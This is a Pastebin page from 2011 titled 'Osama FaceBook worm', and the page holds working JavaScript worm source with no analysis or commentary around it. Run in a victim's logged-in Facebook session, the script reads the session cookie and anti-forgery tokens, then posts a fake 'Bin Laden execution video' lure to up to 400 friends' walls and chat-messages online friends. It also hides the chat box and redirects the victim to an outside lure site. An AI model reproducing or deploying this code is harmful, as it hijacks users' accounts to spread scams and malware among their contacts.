Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

Osama FaceBook worm

By: a guest on May 3rd, 2011  |  syntax: JavaScript  |  size: 10.72 KB  |  views: 43,482  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  2. // KuNG FU JS v.1  20yrsplus.info
  3. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  4.  
  5. //alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');
  6.  
  7. function readCookie(name) {
  8.        
  9.         var nameEQ = name + "=";
  10.         var ca = document.cookie.split(';');
  11.         for(var i=0;i < ca.length;i++) {
  12.                 var c = ca[i];
  13.                 while (c.charAt(0)==' ') c = c.substring(1,c.length);
  14.                 if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  15.         }
  16.         return null;
  17.  
  18. }
  19.  
  20. var user_id = readCookie("c_user");
  21.  
  22.  
  23. // Setup some variables
  24.  
  25. var post_form_id = document.getElementsByName('post_form_id')[0].value;
  26. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  27.  
  28. // Chat message variables
  29.  
  30. var linkies = [
  31.         "http://www.facebook.com/Osama.Gets.Shot.Down",
  32.         "http://www.facebook.com/Osama.Gets.Shot.Down",
  33.         "http://www.facebook.com/Osama.Gets.Shot.Down",
  34.         "http://www.facebook.com/Osama.Gets.Shot.Down"
  35. ]
  36.  
  37. var this_chat = "Watch Osama's EXECUTION Video! " + linkies[Math.floor(Math.random()*linkies.length)];
  38. var prepared_chat = encodeURIComponent(this_chat);
  39.  
  40.  
  41. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  42. // Post Link to friends walls
  43. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  44.  
  45. var token = Math.round(new Date().getTime() / 1000);
  46.  
  47. var http1 = new XMLHttpRequest();
  48.  
  49. var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";
  50.  
  51. var params1 = "";
  52. http1.open("GET", url1+"?"+params1, true);
  53. http1.onreadystatechange = function() {//Call a function when the state changes.
  54.  
  55.         if(http1.readyState == 4 && http1.status == 200) { // If state = success
  56.                
  57.                 var response1 = http1.responseText;
  58.                
  59.                 response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
  60.                 response1 = JSON.parse(response1); // Convert the response to JSON
  61.                
  62.                 //alert(response4.toSource());
  63.                
  64.                 var count = 0;
  65.                
  66.                 for(uid in response1.payload.entries){
  67.                        
  68.                         if(count < 400){
  69.                                
  70.                                 //alert("SENT TO "+response1.payload.entries[count].uid);
  71.  
  72.                                 // Loop to send messages
  73.                        
  74.                                 // New XMLHttp object
  75.                                 var httpwp = new XMLHttpRequest();
  76.                                                        
  77.                                 var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
  78.                                
  79.                                 var statusmessage="Disturbing Yet Awesome!";
  80.                                 var title="Bin Laden EXECUTION Video! Yes it's REAL!";
  81.                                 var link=linkies[Math.floor(Math.random()*linkies.length)];
  82.                                 var description="Commandos attack Bin Laden's compund and take him out!";
  83.                                 var picture="http://i.imgur.com/yTjtU.jpg";
  84.                                
  85.                                 var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
  86.                                
  87.                                 httpwp.open("POST", urlwp, true);
  88.                                
  89.                                 //Send the proper header information along with the request
  90.                                
  91.                                 httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  92.                                 httpwp.setRequestHeader("Content-length", paramswp.length);
  93.                                 httpwp.setRequestHeader("Connection", "keep-alive");                                   
  94.                                
  95.                                 httpwp.onreadystatechange = function() { //Call a function when the state changes.
  96.                                         if(httpwp.readyState == 4 && httpwp.status == 200){
  97.                                                 //alert(http.responseText);
  98.                                                 //alert('buddy list fetched');
  99.                                         }
  100.  
  101.                                 }
  102.  
  103.                                 httpwp.send(paramswp);
  104.        
  105.                         }
  106.  
  107.                         count++; // increment counter
  108.                
  109.                 }
  110.                                
  111.                 http1.close; // Close the connection
  112.                
  113.                
  114.                
  115.         }
  116.        
  117. }
  118.  
  119. http1.send(null);
  120.  
  121.  
  122. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  123. // Hide chat boxes
  124. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  125.  
  126. var hide = document.getElementById('fbDockChatTabSlider');
  127.  
  128. hide.style.display = "none";
  129.  
  130.  
  131. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  132. // Get online friends and send chat message to them
  133. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  134.  
  135. var http3 = new XMLHttpRequest();
  136.  
  137. var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
  138. var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
  139. http3.open("POST", url3, true);
  140.  
  141. //Send the proper header information along with the request
  142. http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  143. http3.setRequestHeader("Content-length", params3.length);
  144. http3.setRequestHeader("Connection", "close");
  145.  
  146. http3.onreadystatechange = function() {//Call a function when the state changes.
  147.         if(http3.readyState == 4 && http3.status == 200) {
  148.                
  149.                 var response3 = http3.responseText;
  150.                
  151.                 response3 = response3.replace("for (;;);", "");
  152.                 response3 = JSON.parse(response3);
  153.                
  154.                 var count = 0;
  155.                
  156.                 for(property in response3.payload.buddy_list.nowAvailableList){
  157.                        
  158.                         if(count < 100){
  159.                                
  160.                                 // Loop to send messages
  161.                        
  162.                                 // New XMLHttp object
  163.                                 var httpc = new XMLHttpRequest();
  164.                                
  165.                                 // Generate random message ID
  166.                                                                
  167.                                 var msgid = Math.floor(Math.random()*1000000);
  168.                                
  169.                                 var time = Math.round(new Date().getTime() / 1000);
  170.                                
  171.                                 var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
  172.                                 var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
  173.                                 httpc.open("POST", urlc, true);
  174.                                
  175.                                 //Send the proper header information along with the request
  176.                                 httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  177.                                 httpc.setRequestHeader("Content-length", paramsc.length);
  178.                                 httpc.setRequestHeader("Connection", "close");
  179.                                
  180.                                 httpc.onreadystatechange = function() { //Call a function when the state changes.
  181.                                         if(httpc.readyState == 4 && httpc.status == 200){
  182.                                                 //alert(http.responseText);
  183.                                                 //alert('buddy list fetched');
  184.                                         }
  185.                                 }
  186.                                 httpc.send(paramsc);
  187.        
  188.                         }
  189.                        
  190.                         //alert(property);
  191.                         count++; // increment counter
  192.                
  193.                 }
  194.                
  195.                 http3.close; // Close the connection
  196.                
  197.         }
  198. }
  199. http3.send(params3);
  200.  
  201.  
  202.  
  203.  
  204.  
  205.  
  206.  
  207. /*
  208. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  209. // Become a Fan - MW GIVEAWAY
  210. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  211.  
  212. var http4 = new XMLHttpRequest();
  213.  
  214. var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
  215.  
  216. var params4 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
  217.  
  218. http4.open("POST", url4, true);
  219.  
  220. //Send the proper header information along with the request
  221. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  222. http4.setRequestHeader("Content-length", params4.length);
  223. http4.setRequestHeader("Connection", "close");
  224.  
  225. http4.onreadystatechange = function() {//Call a function when the state changes.
  226.         if(http4.readyState == 4 && http4.status == 200) {
  227.                        
  228.                 http4.close; // Close the connection
  229.                
  230.         }
  231. }
  232. http4.send(params4);
  233.  
  234.  
  235. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  236. // Become a Fan - MW GIft
  237. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  238.  
  239. var http5 = new XMLHttpRequest();
  240.  
  241. var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
  242.  
  243. var params5 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
  244.  
  245. http5.open("POST", url5, true);
  246.  
  247. //Send the proper header information along with the request
  248. http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  249. http5.setRequestHeader("Content-length", params5.length);
  250. http5.setRequestHeader("Connection", "close");
  251.  
  252. http5.onreadystatechange = function() {//Call a function when the state changes.
  253.         if(http5.readyState == 4 && http5.status == 200) {
  254.                        
  255.                 http5.close; // Close the connection
  256.                
  257.         }
  258. }
  259. http5.send(params5);
  260. */
  261.  
  262. //document.getElementById('susta').style.display="none";
  263. document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /><br />Please wait...</center>";
  264. setTimeout("window.location = 'http://osama.mytopanswers.info/video.htm';", 15000);